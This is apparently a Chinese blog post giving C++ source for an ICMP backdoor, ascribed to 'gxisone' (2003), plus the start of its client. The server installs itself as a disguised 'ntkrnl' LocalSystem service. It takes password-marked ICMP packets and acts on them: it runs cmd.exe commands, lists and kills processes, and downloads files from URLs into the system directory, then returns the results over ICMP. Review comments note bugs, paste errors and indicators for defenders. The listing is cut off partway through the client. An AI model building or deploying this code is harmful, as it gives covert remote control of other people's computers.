vc++ ICMP后门程序

server.cpp

#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h> 
#include <tlhelp32.h>
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")

#define ICMP_PASSWORD 1234                                             
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))

/* The IP header (IPv4, 20 bytes without options). Only h_len is read in this file, to find the ICMP header.
   NOTE(review): h_len is declared before version; this assumes the compiler packs the first bit-field into
   the low nibble (MSVC does), which is what puts the header length where it sits on the wire. */
typedef struct iphdr {
	unsigned int h_len:4; // 4-bit header length, in 32-bit words
	unsigned int version:4; // 4-bit IP version, 4 = IPv4
	unsigned char tos; // 8-bit type of service
	unsigned short total_len; // 16-bit total length (bytes)
	unsigned short ident; // 16-bit identification
	unsigned short frag_and_flags; // 3 flag bits plus the fragment offset
	unsigned char ttl; // 8-bit time to live
	unsigned char proto; // 8-bit protocol (TCP, UDP or other)
	unsigned short checksum; // 16-bit IP header checksum
	unsigned int sourceIP; // 32-bit source IP address
	unsigned int destIP; // 32-bit destination IP address
}IpHeader;

// ICMP header as used by this tool: the 8-byte echo header plus a 4-byte timestamp (12 bytes total,
// which is the "+12" payload offset used in decode_resp). The sequence field doubles as the shared
// secret: 1234 (ICMP_PASSWORD) marks an inbound command, 4321 marks a reply (fill_icmp_data).
typedef struct _ihdr 
{
	BYTE i_type; // 8-bit type (replies are built with type 0)
	BYTE i_code; // 8-bit code
	USHORT i_cksum; // 16-bit checksum 
	USHORT i_id; // identifier (this tool stores its process id here)
	USHORT i_seq; // sequence number, repurposed as the command/reply marker 
	ULONG timestamp; // timestamp (GetTickCount)
}IcmpHeader;
char arg[256]; // command text copied out of the last accepted ICMP payload (decode_resp)
char buffer[2048] = {0};// command output staged for the reply: pipe output of cmd.exe, pslist text, status strings
void decode_resp(char *,int ,struct sockaddr_in *);// parse one inbound ICMP packet and dispatch the command it carries
void fill_icmp_data(char * icmp_data); // build the reply header (seq 4321) and copy `buffer` in as payload
void pslist(void); // append a process list to `buffer`
BOOL killps(DWORD id);// terminate the process with the given id
// NOTE(review): this send(void) shares its name with Winsock's send(); it compiles only because the file is
// C++ and the parameter lists differ (overloading) — in C it would be a conflicting declaration.
void send(void); // send `buffer` to ICMP_DEST_IP as a single ICMP packet, then clear it
char *ICMP_DEST_IP; // textual address of the host whose packet was last accepted; set in decode_resp, read in send
USHORT checksum(USHORT *buffer, int size); // Internet (one's-complement) checksum over `size` bytes

HANDLE                hMutex; // waited on and released in CmdControl, but never created anywhere in this listing
SERVICE_STATUS        ServiceStatus; // status last reported to the SCM
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *); // ServiceMain
void  WINAPI CmdControl(DWORD); // SCM control handler
DWORD WINAPI CmdService(LPVOID); // worker thread: raw-socket receive loop
void  InstallCmdService(void); // "-install": copy self to the system directory and register the service
void  RemoveCmdService(void); // "-remove" / remote "remove": stop and delete the service and the file
void  usage(char *par);
// Entry point. With exactly one argument, "-install"/"-remove" manage the service and exit; any other
// single argument prints usage and exits. With no argument (how the SCM launches a service) it prints
// usage and falls through to StartServiceCtrlDispatcher, which hands control to ICMP_CmdStart.
int main(int argc,char *argv[])
{
	// Service name "ntkrnl" — together with the file name ntkrnl.exe written by InstallCmdService,
	// a static indicator defenders can look for.
	SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};
	if(argc==2)
	{
		if(!stricmp(argv[1],"-install"))
		{
			//usage(argv[0]);
			InstallCmdService();
			printf("InstallCmdService\n");
		}
		else if(!stricmp(argv[1],"-remove"))
		{
			//usage(argv[0]);
			RemoveCmdService();
			printf("RemoveCmdService\n");
		}
		else usage(argv[0]);
		return 0;
	}
	else usage(argv[0]); // argc != 2 (including argc == 1 under the SCM) still reaches the dispatcher below


	StartServiceCtrlDispatcher(DispatchTable); // return value is not checked
	return 0;
}
// ServiceMain for the "ntkrnl" service: registers the control handler, reports RUNNING to the SCM and
// starts the CmdService worker thread. dwArgc/lpArgv are unused.
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
	HANDLE    hThread;
	ServiceStatus.dwServiceType             = SERVICE_WIN32;
	ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
	ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
	ServiceStatus.dwServiceSpecificExitCode = 0;
	ServiceStatus.dwWin32ExitCode           = 0;
	ServiceStatus.dwCheckPoint              = 0;
	ServiceStatus.dwWaitHint                = 0;
	ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
	if(ServiceStatusHandle==0)
	{
		OutputDebugString("RegisterServiceCtrlHandler Error !\n");
		return ;
	}
	// RUNNING is reported before the worker thread exists; a CreateThread failure below is only logged.
	ServiceStatus.dwCurrentState = SERVICE_RUNNING;
	ServiceStatus.dwCheckPoint   = 0;
	ServiceStatus.dwWaitHint     = 0;

	if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
	{
		OutputDebugString("SetServiceStatus in CmdStart Error !\n");
		return ;
	}
	hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
	if(hThread==NULL)
	{
		OutputDebugString("CreateThread in CmdStart Error !\n");
	}
	// hThread is never closed.
	return ;
}
// SCM control handler. PAUSE/CONTINUE only change the reported state — CmdService never reads
// ServiceStatus, so the receive loop keeps running. STOP reports STOPPED and returns without
// signalling the worker thread.
void WINAPI CmdControl(DWORD dwCode)
{
	switch(dwCode)
	{
	case SERVICE_CONTROL_PAUSE:
		ServiceStatus.dwCurrentState = SERVICE_PAUSED;
		break;
	case SERVICE_CONTROL_CONTINUE:
		ServiceStatus.dwCurrentState = SERVICE_RUNNING;
		break;
	case SERVICE_CONTROL_STOP:      
		// hMutex is declared but never created anywhere in this listing; a wait on a NULL handle
		// fails immediately, so this does not serialise with the worker as was presumably intended.
		WaitForSingleObject(hMutex,INFINITE);
		ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
		ServiceStatus.dwWin32ExitCode = 0;
		ServiceStatus.dwCheckPoint    = 0;
		ServiceStatus.dwWaitHint      = 0;
		if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
		{
			OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
		}
		ReleaseMutex(hMutex);
		CloseHandle(hMutex);
		return ;
	case SERVICE_CONTROL_INTERROGATE:
		break;
	default:
		break;
	}
	if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
	{
		OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
	}
	return ;
}
// Worker thread of the service: opens a raw ICMP socket and loops forever, handing every ICMP packet
// that reaches the host to decode_resp, which applies the sequence-number "password". It runs in the
// service process (CreateService passes a NULL account, i.e. LocalSystem), which is why the raw socket
// and the later cmd.exe / TerminateProcess calls are expected to succeed. lpParam is unused.
// Original author's note on this line: "this is the service's main function; put your code here".
DWORD WINAPI CmdService(LPVOID lpParam)
{   
	char *icmp_data;
	int bread,datasize,retval;
	SOCKET sockRaw = (SOCKET)NULL;
	WSADATA wsaData;
	struct sockaddr_in dest,from;
	int fromlen = sizeof(from);
	int timeout = 2000; // receive timeout (ms) so the loop polls instead of blocking forever
	char *recvbuf;

	if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
	{
		// "%s" is given an int here (and on the WSASocket line below): undefined behaviour.
		printf("WSAStartup failed: %s\n",retval);
		ExitProcess(STATUS_FAILED); // terminates the whole service process
	}
	// Raw ICMP socket: receives all ICMP traffic delivered to the host, not just replies to our own requests.
	sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
	if (sockRaw == INVALID_SOCKET)
	{
		printf("WSASocket() failed: %s\n",WSAGetLastError());
		ExitProcess(STATUS_FAILED);
	}
	__try{
		bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
		if(bread == SOCKET_ERROR) __leave;

		// dest is zeroed and never given an address; datasize is just the 12-byte header.
		memset(&dest,0,sizeof(dest));
		dest.sin_family = AF_INET;
		datasize=0;
		datasize += sizeof(IcmpHeader); 
		icmp_data =(char*)xmalloc(MAX_PACKET);
		recvbuf = (char*)xmalloc(MAX_PACKET); // allocation result is not checked (only icmp_data is)
		if (!icmp_data) {
			//fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());
			__leave;
		}
		memset(icmp_data,0,MAX_PACKET);
		for(;;) {
			int bwrote;
			// Sends an all-zero ICMP header to the unset destination on every pass; looks like leftover
			// scaffolding from the ping sample this is based on — result is ignored.
			bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));
			bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
			if (bread == SOCKET_ERROR)
			{
				if (WSAGetLastError() == WSAETIMEDOUT)continue;
				__leave; // any other receive error ends the service loop
			}
			decode_resp(recvbuf,bread,&from);
			Sleep(200);
			// sizeof(recvbuf) is the size of the pointer, so only 4/8 bytes are cleared here.
			memset(recvbuf,0,sizeof(recvbuf));
		}
	}
	__finally {
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	return 0;
}


// Persistence installer ("-install"): copies the running executable into the system directory as
// ntkrnl.exe, registers it as an auto-start, own-process service named "ntkrnl" (NULL account, i.e.
// LocalSystem) and starts it. Indicators for defenders: ntkrnl.exe under GetSystemDirectory() and a
// service with name and display name "ntkrnl". All progress is printed to the console.
void InstallCmdService(void)
{
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	char             lpCurrentPath[MAX_PATH];
	char             lpImagePath[MAX_PATH];
	char             *lpHostName;
	WIN32_FIND_DATA  FileData;
	HANDLE           hSearch;
	DWORD            dwErrorCode;
	SERVICE_STATUS   InstallServiceStatus;

	// strcat into a MAX_PATH buffer with no length check.
	GetSystemDirectory(lpImagePath,MAX_PATH);
	strcat(lpImagePath,"\\ntkrnl.exe");
	lpHostName=NULL; // local machine

	printf("Transmitting File ... ");
	hSearch=FindFirstFile(lpImagePath,&FileData); // used only as an existence test
	if(hSearch==INVALID_HANDLE_VALUE)
	{
		GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
		if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 
		{
			dwErrorCode=GetLastError();
			if(dwErrorCode==5) // ERROR_ACCESS_DENIED
			{
				printf("Failure ... Access is Denied !\n");         
			}
			else
			{
				printf("Failure !\n");
			}
			return ;
		}
		else
		{
			printf("Success !\n");
		}
	}
	else
	{
		printf("already Exists !\n");
		FindClose(hSearch);
	}
	schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
	if(schSCManager==NULL)
	{
		printf("Open Service Control Manager Database Failure !\n");
		return ;
	}
	printf("Creating Service .... ");
	// Binary path is given as the bare name "ntkrnl.exe" rather than the full path built above.
	schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
		SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
		SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 
	if(schService==NULL)
	{
		dwErrorCode=GetLastError();
		if(dwErrorCode!=ERROR_SERVICE_EXISTS)
		{
			printf("Failure !\n");
			CloseServiceHandle(schSCManager);
			return ;
		}
		else
		{
			printf("already Exists !\n");
			schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
			if(schService==NULL)
			{
				printf("Opening Service .... Failure !\n");
				CloseServiceHandle(schSCManager);
				return ;
			}
		}
	}
	else
	{
		printf("Success !\n");
	}
	printf("Starting Service .... ");
	if(StartService(schService,0,NULL)==0)                         
	{
		dwErrorCode=GetLastError();
		if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
		{
			printf("already Running !\n");
			CloseServiceHandle(schSCManager);  
			CloseServiceHandle(schService);
			return ;
		}
	}
	else
	{
		printf("Pending ... ");
	}
	// Polls while START_PENDING. If the very first QueryServiceStatus fails, InstallServiceStatus
	// is read uninitialised by the check that follows the loop.
	while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           
	{
		if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
		{
			Sleep(100);
		}
		else
		{
			break;
		}
	}
	if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
	{
		printf("Failure !\n");                       
	}
	else
	{
		printf("Success !\n");
	}
	CloseServiceHandle(schSCManager);
	CloseServiceHandle(schService);
	return ;
}
// Uninstaller ("-remove" from the console, or the remote "remove" command handled in decode_resp,
// in which case it runs inside the very service being removed): stops and deletes the "ntkrnl"
// service, then deletes ntkrnl.exe from the system directory.
void RemoveCmdService(void) 
{
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	char             lpImagePath[MAX_PATH];
	char             *lpHostName;
	WIN32_FIND_DATA  FileData;
	SERVICE_STATUS   RemoveServiceStatus;
	HANDLE           hSearch;
	DWORD            dwErrorCode;

	GetSystemDirectory(lpImagePath,MAX_PATH);
	strcat(lpImagePath,"\\ntkrnl.exe");
	lpHostName=NULL; // local machine

	schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
	if(schSCManager==NULL)
	{
		printf("Opening SCM ......... ");
		dwErrorCode=GetLastError();
		if(dwErrorCode!=5) // 5 == ERROR_ACCESS_DENIED
		{
			printf("Failure !\n"); 
		}
		else
		{
			printf("Failuer ... Access is Denied !\n");
		}
		return ;
	}
	schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
	if(schService==NULL) 
	{
		printf("Opening Service ..... ");
		dwErrorCode=GetLastError();
		if(dwErrorCode==1060) // 1060 == ERROR_SERVICE_DOES_NOT_EXIST
		{
			printf("no Exists !\n");
		}
		else
		{
			printf("Failure !\n");
		}
		// schSCManager is closed here and again after the if/else below, where a NULL schService
		// is also passed to CloseServiceHandle.
		CloseServiceHandle(schSCManager);
	}
	else
	{
		printf("Stopping Service .... ");
		if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
		{
			if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
			{
				printf("already Stopped !\n"); 
			}
			else
			{
				printf("Pending ... ");
				if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
				{
					// Busy-waits on STOP_PENDING; the QueryServiceStatus result is not checked.
					while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
					{
						Sleep(10);
						QueryServiceStatus(schService,&RemoveServiceStatus);
					}
					if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
					{
						printf("Success !\n");
					}
					else
					{
						printf("Failure !\n");
					}
				}
				else
				{
					printf("Failure !\n");          
				}
			}
		}
		else
		{
			printf("Query Failure !\n");
		}
		printf("Removing Service .... ");     
		if(DeleteService(schService)==0)
		{
			printf("Failure !\n");   
		}
		else
		{
			printf("Success !\n");
		}
	}
	CloseServiceHandle(schSCManager);        
	CloseServiceHandle(schService);
	printf("Removing File ....... ");
	Sleep(1500); // presumably gives the stopped service process time to release the file
	hSearch=FindFirstFile(lpImagePath,&FileData);
	if(hSearch==INVALID_HANDLE_VALUE)
	{
		printf("no Exists !\n");
	}
	else
	{
		if(DeleteFile(lpImagePath)==0)
		{
			printf("Failure !\n");               
		}
		else
		{
			printf("Success !\n");
		}
		FindClose(hSearch);
	}
	return ;
}
// Command dispatcher for inbound ICMP packets — the control channel of this tool.
// buf/bytes: the raw IP datagram returned by recvfrom on the raw socket; from: its sender.
// A packet is accepted only when the ICMP sequence field equals ICMP_PASSWORD (1234); the command
// text then starts right after the 12-byte ICMP header. Commands: "pskill <pid>", "pslist",
// "remove\n", "http://<url> -<name>\n" (download into the system directory), anything else is run
// through cmd.exe /c. Output is staged in `buffer` and returned to the sender by send().
// Detection notes: the fixed sequence values 1234 (inbound) / 4321 (replies), readable command and
// status strings inside ICMP payloads, and cmd.exe spawned by the "ntkrnl" service with redirected
// standard handles are all static indicators.
// `bytes` is never consulted: the payload copy below reads a fixed 256 bytes.
void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{

	IpHeader *iphdr;
	IcmpHeader *icmphdr;
	unsigned short iphdrlen;
	iphdr = (IpHeader *)buf;
	iphdrlen = iphdr->h_len * 4 ; // IP header length is in 32-bit words
	icmphdr = (IcmpHeader*)(buf + iphdrlen);
	if(icmphdr->i_seq==ICMP_PASSWORD)// the sequence number is the "password"; only then is the payload processed
	{
		ICMP_DEST_IP=inet_ntoa(from->sin_addr);// reply target = source address of the packet
		// 12 == sizeof(IcmpHeader). Copies 256 bytes regardless of `bytes`; this stays inside the
		// MAX_PACKET receive buffer but can include stale data beyond the real payload.
		memcpy(arg,buf+iphdrlen+12,256);
		if (!memcmp(arg,"pskill",6))
		{
			// strstr returns NULL when no space follows "pskill"; atoi(NULL) is undefined behaviour.
			killps(atoi(strstr(arg," ")));
			memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
			send();
		}

		else if (!memcmp(arg,"pslist",6)){pslist();send();}
		else if (!strcmp(arg,"remove\n"))
		{
			RemoveCmdService(); // self-uninstall: stops/deletes the service and the dropped file
			memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
			send();
			return;
		}
		// NOTE(review): the next line lost its leading "//" in the blog paste; as shown it is not valid
		// C++ and the listing does not compile until it is restored as a comment.
		************    http下载   *************
		else if (!memcmp(arg,"http://",7))   
		{
			// "http://<url> -<name>\n": fetch <url> and store it in the system directory as <name>.
			if(char *FileName=strstr(arg,"-"))
			{

				char url[200];// holds the URL part of the command
				memset(url,0,200);
				// No bound against 200: a '-' beyond offset 200 in `arg` makes this overrun url[].
				memcpy(url,arg,int(FileName-arg-1));
				char fname[MAX_PATH];
				GetSystemDirectory(fname,MAX_PATH);
				FileName++;
				// strcat without length checks; note the forward-slash separator.
				strcat(fname,"//");
				strcat(fname,FileName);
				*strstr(fname,"\n")=NULL; // NULL dereference if the command carries no trailing newline
				HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
				memset(buffer,0,sizeof(buffer));
				// sizeof("Download OK\n") is one short of the string actually copied; the terminator
				// comes from the memset above.
				if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));
				else 
					memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
				send();
				return;
			}
		}
		//*******************************************
		else{
			// Everything else: run via cmd.exe /c with stdout/stderr redirected into an anonymous pipe.
			SECURITY_ATTRIBUTES sa;// inheritable pipe handles so the child can write to them
			HANDLE hRead,hWrite;
			sa.nLength = sizeof(SECURITY_ATTRIBUTES);
			sa.lpSecurityDescriptor = NULL;
			sa.bInheritHandle = TRUE;
			if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
			{
				printf("Error On CreatePipe()");
				return;
			}

			STARTUPINFO si;
			PROCESS_INFORMATION pi; 
			si.cb = sizeof(STARTUPINFO);
			GetStartupInfo(&si); 
			si.hStdError = hWrite;
			si.hStdOutput = hWrite;
			si.wShowWindow = SW_HIDE;
			si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
			char cmdline[270];
			// cmdline is 270 bytes but receives the system directory (up to MAX_PATH), the literal
			// below and up to 256 bytes of `arg` — no length check.
			GetSystemDirectory(cmdline,MAX_PATH+1);
			strcat(cmdline,"//cmd.exe /c");
			strcat(cmdline,arg);
			if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
			{
				printf("Error on CreateProcess()");
				return; // hRead/hWrite leak on this path
			}
			CloseHandle(hWrite); // drop our write end so ReadFile fails (broken pipe) once the child exits


			DWORD bytesRead;
			// Each ReadFile overwrites `buffer` from offset 0, so only the last chunk survives, and a
			// full 2048-byte read leaves no NUL terminator for the strlen() in fill_icmp_data/send.
			for(;;){
				if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
				Sleep(200);
			}
			// hRead, pi.hProcess and pi.hThread are never closed.
			//printf("%s",buffer);
			// NOTE(review): the lone "/" on the next line is a paste artifact, not valid C++.
			/
			// send the captured output back
			send();
		}
		

	}
	//else printf("Other ICMP Packets!\n");
	//printf(endl; 
}


/*
 * Internet (RFC 1071) one's-complement checksum over `size` bytes at `buffer`.
 * 16-bit words are summed in host order, a trailing odd byte is added as-is,
 * the carries are folded back into 16 bits and the complement is returned.
 */
USHORT checksum(USHORT *buffer, int size) 
{
	unsigned long acc = 0;
	int remaining = size;

	/* full 16-bit words */
	for (; remaining > 1; remaining -= 2) {
		acc += *buffer;
		buffer++;
	}
	/* odd trailing byte (also taken when size was negative, as in the original loop exit) */
	if (remaining != 0) {
		acc += *(UCHAR *)buffer;
	}
	/* fold the carry bits back into the low 16 bits */
	acc = (acc & 0xffff) + (acc >> 16);
	acc += acc >> 16;
	return (USHORT)~acc;
}

// Builds the reply in icmp_data: an ICMP echo reply (type 0, code 0) whose sequence number 4321 is
// the marker the client side looks for, followed by the text in the global `buffer`. The checksum
// field is left 0 here and filled in by send() after this returns.
void fill_icmp_data(char * icmp_data)
{
	IcmpHeader *icmp_hdr;
	char *datapart;
	icmp_hdr = (IcmpHeader*)icmp_data;
	icmp_hdr->i_type = 0;
	icmp_hdr->i_code = 0;
	icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
	icmp_hdr->i_cksum = 0;
	icmp_hdr->i_seq =4321; // reply marker (inbound commands use 1234)
	icmp_hdr->timestamp = GetTickCount(); // set the timestamp
	datapart = icmp_data + sizeof(IcmpHeader);
	// Relies on `buffer` being NUL-terminated; a full 2048-byte ReadFile in decode_resp leaves none.
	memcpy(datapart,buffer,strlen(buffer));
	//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
}
/* Print the banner followed by the two supported command-line switches; par is the program name. */
void  usage(char *par)
{
	static const char *const banner[] = {
		"\t\t=====Welcome to www.hackerxfiles.net======\n",
		"\n",
		"\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n",
		"\t\t---[ E-mail: gxisone@hotmail.com      ]---\n",
		"\t\t---[                        2003/8/15 ]---\n",
		"\n",
	};
	size_t count = sizeof banner / sizeof banner[0];
	for (size_t i = 0; i < count; i++) {
		fputs(banner[i], stdout);
	}
	printf("\t\tUsage: %s -install (to install service)\n", par);
	printf("\t\t       %s -remove (to remove service)\n", par);
	fputs("\n", stdout);
}
// Sends the global `buffer` to ICMP_DEST_IP as one ICMP echo reply (seq 4321 via fill_icmp_data),
// using a fresh Winsock session and raw socket per call, then clears `buffer`.
// Name clash: Winsock also exports send(); this compiles in C++ as an overload with different parameters.
void send(void)
{
	WSADATA wsaData;
	SOCKET sockRaw = (SOCKET)NULL;
	struct sockaddr_in dest;
	int bread,datasize,retval,bwrote;
	int timeout = 1000;
	char *icmp_data;
	// Either failure terminates the whole service process.
	if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
	if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
		==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
	__try
	{
		if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
		// send timeout set above
		memset(&dest,0,sizeof(dest));
		dest.sin_family = AF_INET;
		dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); // address recorded by decode_resp
		datasize=strlen(buffer); // assumes `buffer` is NUL-terminated
		datasize+=sizeof(IcmpHeader); 
		icmp_data=(char*)xmalloc(MAX_PACKET); // never freed: one HeapAlloc leaked per reply
		if(!icmp_data) __leave;
		memset(icmp_data,0,MAX_PACKET);
		fill_icmp_data(icmp_data); // fill in the ICMP header and payload
		((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); // compute checksum
		bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); // send the packet
		if (bwrote == SOCKET_ERROR)
		{
			//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
			//printf("sendto failed:"<<WSAGetLastError()<<endl;
			__leave; // send errors are silently dropped
		}
		//printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
	}

	__finally 
	{
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	memset(buffer,0,sizeof(buffer)); // `buffer` is a real array here, so this clears all 2048 bytes
	Sleep(200);
}
// Appends one "<exe>\t\t<pid>\n" line per running process (Toolhelp snapshot) to the global `buffer`.
// The printf calls go to stdout, which a service process does not normally have attached.
void pslist(void)
{
	HANDLE hProcessSnap = NULL;
	PROCESSENTRY32 pe32= {0};
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcessSnap == (HANDLE)-1) // (HANDLE)-1 == INVALID_HANDLE_VALUE
	{
		printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
		return ;
	}
	pe32.dwSize = sizeof(PROCESSENTRY32);
	printf("\nProcessName     ProcessID");
	if (Process32First(hProcessSnap, &pe32))
	{
		char a[5]; // room for 4 digits + NUL: itoa overflows this for any PID of 5 or more digits
		do
		{
			// strcat into buffer[2048] with no bound; a long process list overruns it.
			strcat(buffer,pe32.szExeFile);
			strcat(buffer,"\t\t");
			itoa(pe32.th32ProcessID,a,10);
			strcat(buffer,a);
			strcat(buffer,"\n");
			//printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
		}
		while (Process32Next(hProcessSnap, &pe32));
	}
	else
	{
		printf("\nProcess32Firstt() failed:%d",GetLastError());
	}
	CloseHandle (hProcessSnap);
	return;
}
// Enables (bEnablePrivilege != FALSE) or clears the named privilege on hToken — the well-known
// documentation sample. killps uses it to turn on SE_DEBUG_NAME for the current process token.
// Returns FALSE if the privilege name is unknown or the adjustment did not fully apply.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)
{
	TOKEN_PRIVILEGES tp;
	LUID luid;
	if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
	{
		printf("\nLookupPrivilegeValue error:%d", GetLastError() ); // %d given a DWORD (format mismatch)
		return FALSE; 
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	if (bEnablePrivilege)
		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	else
		tp.Privileges[0].Attributes = 0;
	// Enable the privilege or disable all privileges.
	AdjustTokenPrivileges(
		hToken, 
		FALSE, 
		&tp, 
		sizeof(TOKEN_PRIVILEGES), 
		(PTOKEN_PRIVILEGES) NULL, 
		(PDWORD) NULL); 
	// Call GetLastError to determine whether the function succeeded: the return value is ignored
	// because AdjustTokenPrivileges can return TRUE yet set ERROR_NOT_ALL_ASSIGNED when the
	// token does not hold the privilege.
	if (GetLastError() != ERROR_SUCCESS) 
	{ 
		printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 
		return FALSE; 
	} 
	return TRUE;
}

// Terminates process `id`: enables SeDebugPrivilege on the current process token, opens the target
// with PROCESS_ALL_ACCESS and calls TerminateProcess with exit code 1. Returns TRUE only if the
// terminate call succeeded. bRet is declared but unused.
BOOL killps(DWORD id)
{
	HANDLE hProcess=NULL,hProcessToken=NULL;
	BOOL IsKilled=FALSE,bRet=FALSE;
	__try
	{
		if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
		{
			printf("\nOpen Current Process Token failed:%d",GetLastError());
			__leave;
		}
		//printf("\nOpen Current Process Token ok!");
		if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
		{
			__leave;
		}
		printf("\nSetPrivilege ok!");
		if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
		{
			printf("\nOpen Process %d failed:%d",id,GetLastError());
			__leave;
		}
		//printf("\nOpen Process %d ok!",id);
		if(!TerminateProcess(hProcess,1))
		{
			printf("\nTerminateProcess failed:%d",GetLastError());
			__leave;
		}
		IsKilled=TRUE;
	}
	__finally
	{
		// Handles are closed on every path; the privilege is left enabled on our token.
		if(hProcessToken!=NULL) CloseHandle(hProcessToken);
		if(hProcess!=NULL) CloseHandle(hProcess);
	}
	return(IsKilled);
}

client.cpp

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256]; // one command line typed by the operator; main() reads it with fgets(..., 1024, ...), four times this size
/* The IP header (IPv4, 20 bytes without options). Only h_len is read in this file, to find the ICMP header.
   NOTE(review): h_len is declared before version; this assumes the compiler packs the first bit-field into
   the low nibble (MSVC does). */
typedef struct iphdr {
	unsigned int h_len:4; // 4-bit header length, in 32-bit words
	unsigned int version:4; // 4-bit IP version, 4 = IPv4
	unsigned char tos; // 8-bit type of service
	unsigned short total_len; // 16-bit total length (bytes)
	unsigned short ident; // 16-bit identification
	unsigned short frag_and_flags; // 3 flag bits plus the fragment offset
	unsigned char ttl; // 8-bit time to live
	unsigned char proto; // 8-bit protocol (TCP, UDP or other)
	unsigned short checksum; // 16-bit IP header checksum
	unsigned int sourceIP; // 32-bit source IP address
	unsigned int destIP; // 32-bit destination IP address
}IpHeader;


// ICMP header: the 8-byte echo header plus a 4-byte timestamp (12 bytes, the "+12" offset used in
